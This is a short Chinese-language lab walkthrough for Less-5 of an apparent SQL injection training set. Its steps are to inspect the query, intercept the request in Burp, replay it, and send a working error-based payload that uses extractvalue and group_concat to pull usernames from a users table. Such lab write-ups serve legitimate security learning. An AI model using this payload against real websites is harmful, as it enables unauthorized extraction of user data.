一、Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
1,观察index.php中$sql
2.burp拦截
3.repeater一下
4,简单修改一下,用extractvalue函数
?id=1000' union select 1,2,extractvalue(1,concat('%',(select group_concat(username) from users))) --+
5,大功告成